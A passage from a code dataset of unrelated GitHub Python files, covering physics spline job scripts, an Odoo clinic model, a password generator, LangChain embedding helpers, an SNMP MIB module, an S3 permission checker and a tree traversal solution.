tgt_list = []\n    in_xml_files = []\n    for xml_file in xml_files_dir : \n        xml_file = os.path.basename(xml_file)[:-3]\n        in_xml_files.append(xml_dir+xml_file+\".xml\")\n        xml_content = xml_file.split(\"_\")\n        if len(xml_content) < 4 : continue\n\n        if xml_content[0] in nu_pdg_def : \n            if xml_content[0] not in dir_nu_list : \n                dir_nu_list.append(xml_content[0])\n            if xml_content[2] not in dir_nu_tgt_list: \n                dir_nu_tgt_list.append(xml_content[2])\n            if xml_content[3] not in dir_EW_process_list:\n                dir_EW_process_list.append(xml_content[3])\n        elif xml_content[0] in e_pdg_def : \n            if xml_content[0] not in dir_e_list : \n                dir_e_list.append(xml_content[0])\n            if xml_content[2] not in dir_e_tgt_list : \n                dir_e_tgt_list.append(xml_content[2])\n            if xml_content[3] not in dir_EM_process_list:\n                dir_EM_process_list.append(xml_content[3])\n\n        ## For root output \n        if root_output : \n            if xml_content[0] not in lepton_list : \n                lepton_list.append(xml_content[0]) \n            if xml_content[2] not in tgt_list : \n                tgt_list.append(xml_content[2]) \n\n    dict_target = {}\n    for target in dir_nu_tgt_list : \n        dict_nu = {}\n        for nu in dir_nu_list : \n            dict_nu[nu] = []\n            for process in dir_EW_process_list : \n                if process == 'CCDFR' or process == 'NCDFR' :\n                    if target == 'n' or target == '1000000010': continue\n                dict_nu[nu].append(nu+\"_on_\"+target+\"_\"+process+\".xml\")\n        # Add all files to merge here:\n        dict_target[target] = dict_nu \n    \n    for target in dir_e_tgt_list : \n        dict_e={}\n        if target in dict_target : \n            dict_e = dict_target[target]\n        for e in dir_e_list : \n            dict_e[e] = []\n            for process in dir_EM_process_list : \n                dict_e[e].append(e+\"_on_\"+target+\"_\"+process+\".xml\")\n\n        # Add all files to merge here:\n        dict_target[target] = dict_e \n\n    if grid_system == 'FNAL' : \n        path = \"$CONDOR_DIR_INPUT/\"\n    else : 
\n path = xml_dir\n\n commands = []\n com_total = \"gspladd -o \"+path+\"total_xsec.xml -f \" \n for tgt in dict_target : \n com_nu = \"gspladd -o \"+path+tgt+\".xml -f \"\n for nu in dict_target[tgt]:\n com_proc = \"gspladd -o \"+path+nu+\"_on_\"+tgt+\".xml -f \"\n for file_proc in dict_target[tgt][nu] : \n com_proc += path+file_proc + \",\"\n com_proc = com_proc[:-1]\n commands.append(com_proc) \n com_nu += path+nu+\"_on_\"+tgt+\".xml,\"\n com_nu = com_nu[:-1]\n #if len(dict_target[tgt]) == 1 : \n # commands.append(\"ifdh cp \"+path+nu+\"_on_\"+tgt+\".xml \"+path+tgt+\".xml\")\n #else :\n # commands.append(com_nu) \n com_total += nu+\"_on_\"+tgt+\".xml,\"\n com_total = com_total[:-1]\n\n ## if only one target simply rename\n if len(dict_target) == 1 : \n commands.append(\"ifdh cp \"+path+tgt+\".xml \"+path+\"total_xsec.xml\")\n else :\n commands.append(com_total) \n\n out_files = [ \"total_xsec.xml\" ] \n if os.path.exists( xml_dir + '/total_xsec.xml' ) :\n if store_total_xsec == False :\n # Need to remove xml files before re-generating them \n os.remove( xml_dir + '/total_xsec.xml' )\n \n if root_output :\n # Check if file exists - and remove\n if os.path.exists( xml_dir + '/total_xsec.root' ) :\n # Need to remove xml files before re-generating them \n os.remove( xml_dir + '/total_xsec.root' )\n\n str_probe_list = ''\n str_tgt_list = ''\n for tgt in tgt_list:\n str_tgt_list += tgt+\",\"\n for lepton in lepton_list : \n if lepton in nu_pdg_def : \n str_probe_list += str(nu_pdg_def[lepton])+\",\"\n elif lepton in e_pdg_def : \n str_probe_list += str(e_pdg_def[lepton])+\",\"\n str_probe_list = str_probe_list[:-1]\n str_tgt_list = str_tgt_list[:-1]\n\n ## Create an output file with all the splines in root format\n commands.append( \"gspl2root -p \"+str_probe_list+\" -t \"+str_tgt_list+\" -f \"+path+\"total_xsec.xml -o \"+path+\"total_xsec.root --tune \"+tune )\n out_files.append(\"total_xsec.root\")\n\n # Call Commands\n shell_file = ''\n command_list = []\n if grid_system == 'FNAL' :\n shell_file=FNAL.CreateShellScript ( commands , xml_dir, process_name, out_files, grid_setup, genie_setup, conf_dir, in_xml_files, git_branch, git_loc, configure_INCL,configure_G4 ) \n grid_command_options = FNAL.FNALShellCommands(grid_setup, genie_setup, time, memory, disk )\n command_list.append( \"jobsub_submit \"+grid_command_options+ \" file://\"+shell_file )\n\n ## Add command list to dictionary; \n command_dict = {}\n command_dict[job_ID] = command_list \n return command_dict \n","repo_name":"GENIE-MC/Generator","sub_path":"src/scripts/production/python/xsec_splines/GroupSplineCommands.py","file_name":"GroupSplineCommands.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"35"} +{"seq_id":"13448690735","text":"import english_uk\nimport symbols\nfrom exit_code import ExitCode\n\nALL_CHARACTERS = set(english_uk.ENGLISH_UK_REMOVED_DUPES + symbols.SYMBOLS_REMOVED_DUPES)\nALL_CHARACTERS_VALID_FOR_NAME = set(english_uk.ENGLISH_UK_VALID_FOR_NAME_ONLY + symbols.SYMBOLS_VALID_FOR_NAME_ONLY)\n\n\ndef verify(input_str: str, verbose: bool = True) -> ExitCode:\n if not input_str:\n if verbose:\n print('Invalid: Name must be at least one character.')\n return ExitCode.INVALID_LENGTH\n\n exit_code = ExitCode.SUCCESS\n if len(input_str) > 10:\n if verbose:\n print('Invalid: Name cannot be more than 10 characters.')\n exit_code |= ExitCode.INVALID_LENGTH\n\n if all(char in ALL_CHARACTERS_VALID_FOR_NAME for char in input_str):\n if 
verbose:\n            print('Characters valid!')\n    else:\n        if verbose:\n            print('Invalid: The following characters were not found/allowed: ')\n            print(''.join([char for char in input_str if char not in ALL_CHARACTERS_VALID_FOR_NAME]))\n\n        exit_code |= ExitCode.INVALID_CHARS\n\n    return exit_code\n","repo_name":"kjhf/NintendoSwitchKeyboard","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"40021385022","text":"from odoo import api, fields, models\n\nclass res_partner(models.Model):\n    _inherit = \"res.partner\"\n\n    patient = fields.Char(string='Patient', default='/')\n    name = fields.Char(string='Name')\n    job = fields.Char(string='Job')\n    gender = fields.Selection([\n        ('male','Male'),\n        ('female','Female')\n    ], string='Gender')\n    birth_date = fields.Date('Birth Date')\n    blood_type = fields.Selection([\n        ('a','A'),\n        ('b','B'),\n        ('ab','AB'),\n        ('o','O'),\n    ], string='Blood Type')\n    status = fields.Selection([\n        ('single','Single'),\n        ('married','Married'),\n        ('divorce','Divorce'),\n    ], string='Status')\n    patient_history = fields.One2many('clinic.checkup', 'patient_id', 'Patient History')\n\n    _sql_constraints = [\n        ('unique_patient', 'unique(patient,name)', 'Combination of code and name has been recorded, please check again!'),\n    ] #check again\n\n    @api.model\n    def create(self, vals):\n        vals['patient'] = self.env['ir.sequence'].next_by_code('clinic.patient.sequence')\n        return super(res_partner, self).create(vals)\n\n    @api.multi\n    def name_get(self):\n        result = []\n        for me_id in self:\n            result.append((me_id.id, \"%s - %s\" % (me_id.patient, me_id.name)))\n        return result\n    \n    @api.model\n    def name_search(self, name, args=None, operator='ilike', limit=100):\n        args = args or []\n        if name:\n            recs = self.search([\n                '|',\n                ('patient', operator, name),\n                ('name', operator, name),\n            ] + args, limit=limit)\n        else :\n            recs = self.search([] + args, limit=limit)\n        return recs.name_get()\n\nclass res_partner_doctor(models.Model):\n    _name = \"res.partner.doctor\"\n\n    doctor = fields.Char(string='Doctor', default='/')\n    name = fields.Char(string='Name')\n    comment = fields.Text(string='Comment')\n    doctor_history = fields.One2many('clinic.checkup', 'doctor_id', 'Doctor History')\n\n    _sql_constraints = [\n        ('unique_doctor', 'unique(doctor,name)', 'Combination of code and name has been recorded, please check again!'),\n    ] #check again\n\n    @api.model\n    def create(self, vals):\n        vals['doctor'] = self.env['ir.sequence'].next_by_code('clinic.doctor.sequence')\n        return super(res_partner_doctor, self).create(vals)\n\n    @api.multi\n    def name_get(self):\n        result = []\n        for me_id in self:\n            result.append((me_id.id, \"%s - %s\" % (me_id.doctor, me_id.name)))\n        return result\n    \n    @api.model\n    def name_search(self, name, args=None, operator='ilike', limit=100):\n        args = args or []\n        if name:\n            recs = self.search([\n                '|',\n                ('doctor', operator, name),\n                ('name', operator, name),\n            ] + args, limit=limit)\n        else :\n            recs = self.search([] + args, limit=limit)\n        return recs.name_get()","repo_name":"qvinsky/odoo-clinic","sub_path":"models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"12618984479","text":"\"\"\" Password generator version 2.0 \"\"\"\nimport secrets\nimport string\n\ncount = int(input(\"How many characters should the password contain? 
\"))\nsymbols = input(\"Какие символы будут в пароле: \\n\"\n \"1. Только цифры; \\n\"\n \"2. Только буквы в нижнем регистре; \\n\"\n \"3. Только буквы в верхнем регистре; \\n\"\n \"4. Цифры, буквы в верхнем и нижнем регистрах; \\n\"\n \"5. Цифры, буквы и верхнем и нижнем регистрах и знаки препинания. \\n\"\n \"Ваш выбор цифрой: \")\n\nif symbols == \"1\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits) for i in range(1, count + 1)))\nelif symbols == \"2\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.ascii_lowercase) for i in range(1, count + 1)))\nelif symbols == \"3\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.ascii_uppercase) for i in range(1, count + 1)))\nelif symbols == \"4\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits + string.ascii_lowercase + string.ascii_uppercase) for i in range(1, count + 1)))\nelif symbols == \"5\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation) for i in range(1, count + 1)))\nelse: print(\"Выбрано неверное действие\")\n","repo_name":"flippy-root/Python","sub_path":"password_generator_v2.0.py","file_name":"password_generator_v2.0.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1499393316","text":"from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import Chroma\nfrom langchain.document_loaders import TextLoader\nimport pickle\nfrom langchain import OpenAI\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.embeddings import CohereEmbeddings\nimport os\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.document_loaders import DirectoryLoader\nfrom langchain.retrievers import ContextualCompressionRetriever\nfrom langchain.retrievers.document_compressors import CohereRerank\nfrom langchain.docstore.document import Document\nimport re\nimport codecs\nfrom bs4 import BeautifulSoup\nimport PyPDF2\n\n#For Loading The documents\n####################################### New Version\n# Create text splitter by paragraphs\n# by empty lines\ndef paragraph_text_splitter(text, source):\n paragraphs = re.split(r'\\.', text)\n paragraphs = [' '.join(paragraphs[i:i+5]) for i in range(0, len(paragraphs), 5)]\n paragraphs = [Document(page_content=par, metadata={\"source\": source}) for par in paragraphs]\n return paragraphs\n\n# For Loading The documents\ndef doc_load(files):\n documents = []\n\n for file in files:\n ext = os.path.splitext(file.name)[1]\n \n if ext.lower() == '.md':\n documents.append(Document(page_content=str(file.read(), encoding='utf-8', errors='ignore'), metadata={\"source\": file.name}))\n \n elif ext.lower() == '.html':\n soup = BeautifulSoup(file, 'html.parser')\n paragraphs = [p.get_text() for p in soup.find_all('p')]\n text = '\\n\\n'.join(paragraphs)\n documents.append(Document(page_content=text, metadata={\"source\": file.name}))\n\n elif ext.lower() == '.pdf':\n pdf_reader = PyPDF2.PdfReader(file)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()\n documents.append(Document(page_content=text, metadata={\"source\": file.name}))\n\n # use the text splitter 
by paragraphs\n splitted = []\n for doc in documents:\n paragraphs = paragraph_text_splitter(doc.page_content, doc.metadata['source'])\n splitted.extend(paragraphs)\n\n return splitted\n##########################################\n\n\n# #For Loading The documents\n# def doc_load(files):\n# documents = []\n\n# for file in files:\n# ext = os.path.splitext(file.name)[1]\n# if ext.lower() in ['.md', '.txt']:\n# documents.append(Document(page_content=str(file.read(), encoding='utf-8', errors='ignore'), metadata={\"source\": file.name}))\n# text_splitter = RecursiveCharacterTextSplitter(chunk_size=1024, chunk_overlap=80)\n# splitted = text_splitter.split_documents(documents)\n# print(splitted)\n# return splitted\n\n#We shall not call embedding function again and again, Instead we shall save our embedding in some pickle file locally\ndef save_embedding_into_pickle(file_path):\n sentence_embedding = SentenceTransformerEmbeddings(model_name=\"all-MiniLM-L6-v2\")\n with open(file_path, 'wb') as f:\n pickle.dump(sentence_embedding, f)\n print('done with saving embeddings into pickle')\n\ndef load_embedding_from_pickle(path):\n with open(path, 'rb') as f:\n embedding = pickle.load(f)\n return embedding\n\n\n#Once User uploads all documents we shall also save chroma using this function\ndef save_chroma_using_embedding(documents,\n embedding_pickle_path,\n vector_path):\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma.from_documents(documents, embedding, persist_directory=vector_path)\n db.persist()\n\n# Once User ask questions we only need to load following function\n\ndef load_chroma_with_query_without_compressor(vector_path,\n embedding_pickle_path,\n query,\n num_of_facts=10):\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma(persist_directory=vector_path, embedding_function=embedding)\n db.get()\n retriever = db.as_retriever(search_kwargs={\"k\": num_of_facts})\n ret_ans = retriever.get_relevant_documents(query)\n unique_docs = [doc for i, doc in enumerate(ret_ans) if doc not in ret_ans[:i]]\n return unique_docs\n\n\ndef load_chroma_with_query_with_compressor(vector_path,\n embedding_pickle_path,\n query,\n api_key,\n num_of_facts=10):\n os.environ[\"COHERE_API_KEY\"]= api_key\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma(persist_directory=vector_path, embedding_function=embedding)\n compressor = CohereRerank()\n db.get()\n retriever = db.as_retriever(search_kwargs={\"k\": num_of_facts})\n compression_retriever = ContextualCompressionRetriever(\n base_compressor=compressor,\n base_retriever=retriever\n )\n ret_ans = compression_retriever.get_relevant_documents(query)\n unique_docs = [doc for i, doc in enumerate(ret_ans) if doc not in ret_ans[:i]]\n return unique_docs","repo_name":"priyansh007/AutoBots","sub_path":"backend/autobot/utils/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"6822437979","text":"#\n# PySNMP MIB module FREEBSD-MIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/FREEBSD-MIB\n# Produced by pysmi-0.3.4 at Mon Apr 29 19:02:29 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nOctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols(\"ASN1\", \"OctetString\", \"ObjectIdentifier\", 
\"Integer\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueSizeConstraint\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ConstraintsIntersection\", \"ConstraintsUnion\")\nModuleCompliance, NotificationGroup = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"ModuleCompliance\", \"NotificationGroup\")\nBits, Unsigned32, Counter64, Counter32, IpAddress, MibIdentifier, enterprises, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Integer32, NotificationType, Gauge32, iso, ModuleIdentity = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"Bits\", \"Unsigned32\", \"Counter64\", \"Counter32\", \"IpAddress\", \"MibIdentifier\", \"enterprises\", \"ObjectIdentity\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"TimeTicks\", \"Integer32\", \"NotificationType\", \"Gauge32\", \"iso\", \"ModuleIdentity\")\nDisplayString, TextualConvention = mibBuilder.importSymbols(\"SNMPv2-TC\", \"DisplayString\", \"TextualConvention\")\nfreeBSD = ModuleIdentity((1, 3, 6, 1, 4, 1, 2238))\nfreeBSD.setRevisions(('2006-10-31 08:00',))\nif mibBuilder.loadTexts: freeBSD.setLastUpdated('200610311000Z')\nif mibBuilder.loadTexts: freeBSD.setOrganization('The FreeBSD Project.')\nfreeBSDsrc = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 1))\nif mibBuilder.loadTexts: freeBSDsrc.setStatus('current')\nfreeBSDports = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 2))\nif mibBuilder.loadTexts: freeBSDports.setStatus('current')\nfreeBSDpeople = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 3))\nif mibBuilder.loadTexts: freeBSDpeople.setStatus('current')\nfreeBSDpeoplePhk = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 3, 1))\nif mibBuilder.loadTexts: freeBSDpeoplePhk.setStatus('current')\nfreeBSDVersion = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 4))\nif mibBuilder.loadTexts: freeBSDVersion.setStatus('current')\nmibBuilder.exportSymbols(\"FREEBSD-MIB\", freeBSDpeople=freeBSDpeople, freeBSDpeoplePhk=freeBSDpeoplePhk, freeBSDsrc=freeBSDsrc, freeBSDVersion=freeBSDVersion, freeBSD=freeBSD, freeBSDports=freeBSDports, PYSNMP_MODULE_ID=freeBSD)\n","repo_name":"cisco-kusanagi/mibs.snmplabs.com","sub_path":"pysnmp/FREEBSD-MIB.py","file_name":"FREEBSD-MIB.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"6766426798","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n#from credentials import *\nimport boto3\nfrom datetime import datetime, timedelta\n\n\n# init s3 resource and client .\ns3_resource = boto3.resource('s3',\n aws_access_key_id='',\n aws_secret_access_key= '')\n\n\n# init s3 client .\ns3_client = boto3.client('s3',\n aws_access_key_id='',\n aws_secret_access_key= '')\n\n\n\n# loop through s3 buckets and get bucket name\nbucket_name = \"\"\nbucket_object=\"\"\ns3_all= s3_resource.buckets.all()\n\nfor bucket in s3_all:\n print(\"\\nAvailable Bucket is: \", bucket.name )\n bucket_name = bucket.name\n \n\n\n# AccessPermissions\naccess_control_list = s3_client.get_bucket_acl(Bucket=bucket_name)\nprint(\"\\nAccess Permissions List Are :\\n\")\nfor Permission in access_control_list:\n\tprint(Permission)\n \n# Public/Private\n# METHOD 1\nresponse = s3_client.get_public_access_block(Bucket=bucket_name)\nif response['PublicAccessBlockConfiguration']['BlockPublicAcls'] 
and response['PublicAccessBlockConfiguration']['BlockPublicPolicy'] :\n print(\"Bucket Is Private\")\nelse:\n print(\"Bucket Is Public\")\n\n\n\n\n#s3 = boto3.resource('s3')\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\nfilename=\"personal-jw\"\n\naccess_control_list_size = s3_client.get_object(Bucket=bucket_name ,key=filename )\nprint(access_control_list_size)\n'''\n\n\n\n\n\n\n\n\n\n# s3_connection = s3_resource\n# bucket_obj = s3_connection.get_bucket(bucket_name)\n# print(bucket_obj)\n\n# s3 = boto.connect_s3()\n# s3 = boto3.resource('s3')\n# the_bucket = s3_resource.Bucket(bucket_name)\n# bucket = s3_client.lookup(bucket_name)\n# total_bytes = 0\n# for key in the_bucket:\n# total_bytes += key.size\n# print(total_bytes)\n# print(dir(the_bucket))\n\n# bucket_size = sum(obj['Size'] for obj in s3_client.list_objects(Bucket=bucket_name))#['Contents']\n# print(bucket_size)\n\n# response = client.list_objects(\n# Bucket=bucket_name,\n# # Marker='moe'\n# )\n# for content in response['Contents']:\n# size = content['Size'] / 1024\n# print(str(size) + \" KB\")\n\n\n\n\n# s3 = boto3.resource('s3')\n# for my_bucket_object in my_bucket.objects.all():\n# print(my_bucket_object)\n\n\n\n\n# bucket = s3_client.Bucket(bucket_name)\n# size = sum(1 for _ in bucket.objects.all())\n# print(size)\n\n# response = s3_client.list_objects(Bucket=bucket_name)#['Contents']\n# bucket_size = sum(obj['Size'] for obj in response)\n# print(bucket_size)\n\n\n########################################################################################################\n# LIBCLOUD\n# client = get_driver(Provider.S3)\n\n# s3 = client(Access_key_ID, Secret_access_key)\n\n# container = s3.get_container(container_name='personal-jw')\n\n# objects = s3.list_container_objects(container)\n\n\n\n# print(container)\n# print(objects.list_objects)\n\n# # print(dir(container))\n# download_to = r\"C:\\Users\\ahmed.mosaad\\Desktop\\py\\automatedsys\"\n# # s3.download_object(objects, download_to)\n\n\n# from libcloud.storage.types import Provider\n# from libcloud.storage.providers import get_driver\n# from my_credentials import *\n\n# # Path to a very large file you want to upload\n# FILE_PATH = r'C:\\Users\\Mos2d\\Downloads\\panda.jpg'\n\n# cls = get_driver(Provider.S3)\n# driver = cls(Access_key_ID, Secret_access_key)\n\n# container = driver.get_container(container_name='my-image-12345')\n\n# # This method blocks until all the parts have been uploaded.\n# extra = {'content_type': 'application/octet-stream'}\n\n# with open(FILE_PATH, 'rb') as iterator:\n# obj = driver.upload_object_via_stream(iterator=iterator,\n# container=container,\n# object_name='backup.jpg',\n# extra=extra)","repo_name":"shakirgad/develop-an-aws-api-using-django","sub_path":"ec2s3/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37764456072","text":"\"\"\"\n\n Drawing module\n\n\"\"\"\nimport os\nfrom io import StringIO\nfrom recursion_tree.node import Node, analyze_nodes\n\n\ndef draw_boundary(node: Node) -> None:\n \"\"\"\n Group boundary\n \"\"\"\n if node.draw_boundary:\n width = node.right - node.left\n height = node.top - node.bottom\n\n opacity = round(((node.depth + 1) * 16) / 255, 3)\n\n left = node.left + Node.origin_x\n top = node.bottom + Node.origin_y\n\n draw('rect', ('fill-opacity', opacity), rx=node.node_bound_radius, x=left,\n y=top, width=width, height=height, fill=node.color_boundary,\n stroke=node.color_boundary_stroke, 
container=Node.svg)\n\n\ndef draw_node(nodes: list, node_id: int) -> None:\n \"\"\"\n Node body drawing\n \"\"\"\n node = nodes[node_id-1]\n\n left_edge = Node.origin_x + node.x - node.width // 2\n right_edge = Node.origin_x + node.x + node.width // 2\n\n center_x = Node.origin_x + node.x\n center_y = Node.origin_y + node.y\n\n node_x = center_x - node.width // 2\n node_y = center_y - node.height // 2\n\n draw('rect', ('stroke-width', node.node_stroke_width), ('fill-opacity', node.node_opacity),\n x=node_x, y=node_y, width=node.width, rx=node.node_radius, height=node.height,\n fill=node.color_node_body, stroke=node.color_node_stroke, container=Node.svg)\n\n labels = node.text.split('\\n')\n if len(labels) > 1:\n label = f'{labels[0]}'\n for each in labels[1:]:\n label += f'{each}'\n\n draw('line', ('stroke-width', node.node_stroke_width), x1=left_edge, y1=center_y,\n x2=right_edge, y2=center_y, stroke=node.color_node_stroke, container=Node.svg)\n\n text(x=center_x, y=center_y - 7, label=label, fill=node.color_text, container=Node.svg)\n\n else:\n text(x=center_x, y=center_y + 5, label=node.text, fill=node.color_text, container=Node.svg)\n\n\ndef draw_connections(node: Node) -> None:\n \"\"\"\n Draw connection lines with call number\n \"\"\"\n if not node.parent:\n return\n\n start_x = node.parent.x + Node.origin_x\n start_y = node.parent.y + Node.origin_y + node.parent.height // 2\n\n end_x = node.x + Node.origin_x\n end_y = node.y + Node.origin_y - node.height // 2\n\n if node.node_stroke_bezier:\n shift = 100\n m = f\"M{start_x}, {start_y}\"\n c = f\"C{start_x}, {start_y + shift} {end_x}, {end_y - shift} {end_x} {end_y}\"\n d = m + ' ' + c\n draw('path', ('stroke-width', node.node_conn_width), d=d, fill='transparent',\n stroke=node.color_connection, container=Node.svg)\n else:\n draw('line', ('stroke-width', node.node_conn_width), x1=start_x, y1=start_y,\n x2=end_x, y2=end_y, stroke=node.color_connection, container=Node.svg)\n\n if not node.draw_calls:\n return\n\n center_x = (start_x + end_x) // 2\n center_y = (start_y + end_y) // 2\n\n min_rad = node.char_width * len(str(node.node_id)) / 1.8\n radius = max(min_rad, node.node_num_radius)\n\n draw('circle', ('stroke-width', node.node_conn_width), cx=center_x, cy=center_y,\n r=radius, fill=node.color_num_background, stroke=node.color_connection,\n container=Node.svg)\n\n text(x=center_x, y=center_y + 5, fill=node.color_num_text,\n label=node.node_id, container=Node.svg)\n\n\ndef draw(shape, *pairs, container: list = None, **kwargs) -> str:\n \"\"\"\n Abstract drawing function\n \"\"\"\n par_1 = [f'{pair[0]}=\"{pair[1]}\"' for pair in pairs]\n par_2 = [f'{key}=\"{value}\"' for key, value in kwargs.items()]\n result = f'<{shape} ' + ' '.join(par_1 + par_2) + ' />'\n\n if container is not None:\n container.append(result)\n\n return result\n\n\ndef text(label: str, anchor: str = 'middle', container: list = None, **kwargs) -> str:\n \"\"\"\n Add text\n \"\"\"\n par_2 = [f'{key}=\"{value}\"' for key, value in kwargs.items()]\n result = f'{label}'\n\n if container is not None:\n container.append(result)\n\n return result\n\n\ndef draw_tree(func_name: str, nodes: list, settings: dict) -> None:\n \"\"\"\n Main tree drawing\n \"\"\"\n if not nodes:\n return\n\n nodes = analyze_nodes(nodes, settings)\n\n Node.initial_align(nodes, settings)\n root = nodes[0]\n\n width = (root.right - root.left) + settings['margin'] * 2\n height = (root.top - root.bottom) + settings['margin'] * 2 + settings['ver_spacing']\n\n Node.origin_x = abs(root.left) + 
settings['margin']\n Node.origin_y = abs(nodes[-1].bottom) + settings['margin']\n\n header = f'''\n \n \n '''\n Node.svg.append(header)\n\n draw('rect', x=0, y=0, width=width, height=height,\n fill=settings['color_background'], container=Node.svg)\n\n for node in nodes:\n draw_boundary(node)\n draw_connections(node)\n draw_node(nodes, node.node_id)\n\n Node.svg.append('')\n result = '\\n'.join(Node.svg)\n\n if isinstance(settings['file'], StringIO):\n settings['file'].write(result)\n return\n\n if isinstance(settings['file'], str):\n filename = settings['file'].lower().rstrip('.svg')\n else:\n filename = func_name\n\n i = 1\n while os.path.exists(filename + f'_{i:03d}.svg'):\n i += 1\n\n try:\n with open(filename + f'_{i:03d}.svg', mode='w', encoding='UTF-8') as file:\n file.write(result)\n print(f'New \"{filename}_{i:03d}.svg\" file has been saved.')\n except OSError:\n print(f'Unable to save \"{filename}_{i:03d}.svg\"')\n\n if settings['autostart']:\n try:\n os.startfile(filename + f'_{i:03d}.svg')\n except OSError:\n print(f'Unable to launch \"{filename}_{i:03d}.svg\"')\n","repo_name":"IgorZyktin/recursion_tree","sub_path":"recursion_tree/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"3301496977","text":"import random\r\n\r\n\r\ndef pick_num():\r\n try:\r\n starting_num = int(input(\"Starting Number: \"))\r\n except ValueError:\r\n print(\"Invalid Starting Number -> Provide a Number\")\r\n return False\r\n\r\n try:\r\n ending_num = int(input(\"Ending Number: \"))\r\n except ValueError:\r\n print(\"Invalid Ending Number -> Provide a Number\")\r\n return False\r\n\r\n if not (starting_num < ending_num):\r\n print(\"Starting number isn't smaller than the larger number. Invalid input.\")\r\n return False\r\n\r\n if starting_num == ending_num:\r\n print(\"Starting and ending number are the same. 
Invalid input.\")\r\n return False\r\n\r\n random_num = random.randint(starting_num, ending_num)\r\n\r\n return random_num\r\n\r\n\r\nwhile True:\r\n num = pick_num()\r\n if num != False:\r\n break\r\n\r\nprint(f\"Random Number: {num}\")","repo_name":"joshuajz/grade12","sub_path":"1.functions/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35200948030","text":"#!/usr/bin/python3\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Initial solution using Breath-First Search \n def levelOrder(self, root: TreeNode):\n if root is None:\n return []\n res = []\n def bfs(node):\n q = []\n q.append(node)\n while q:\n size = len(q)\n level = []\n while size > 0:\n temp = q.pop(0)\n level.append(temp.val)\n size -= 1\n if temp.left:\n q.append(temp.left)\n if temp.right:\n q.append(temp.right)\n res.append(level)\n bfs(root) \n return res\n\n # Slightly faster without extra function \n def levelOrder(self, root: TreeNode):\n res = []\n if root is None:\n return res\n q = []\n q.append(root)\n while q:\n size = len(q)\n level = []\n for i in range(size):\n temp = q.pop(0)\n level.append(temp.val)\n if temp.left:\n q.append(temp.left)\n if temp.right:\n q.append(temp.right)\n res.append(level)\n return res","repo_name":"abeleinin/leetcode","sub_path":"neetcode150/medium/102-Binary-Tree-Level-Order-Traversal.py","file_name":"102-Binary-Tree-Level-Order-Traversal.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3622395154","text":"# based on https://github.com/datitran/raccoon_dataset/blob/master/xml_to_csv.py\r\n\r\n# assumes running from TF folder models/research/object_detection\r\n\r\n\r\nimport os\r\nimport glob\r\nimport argparse\r\nimport pandas as pd\r\nimport xml.etree.ElementTree as 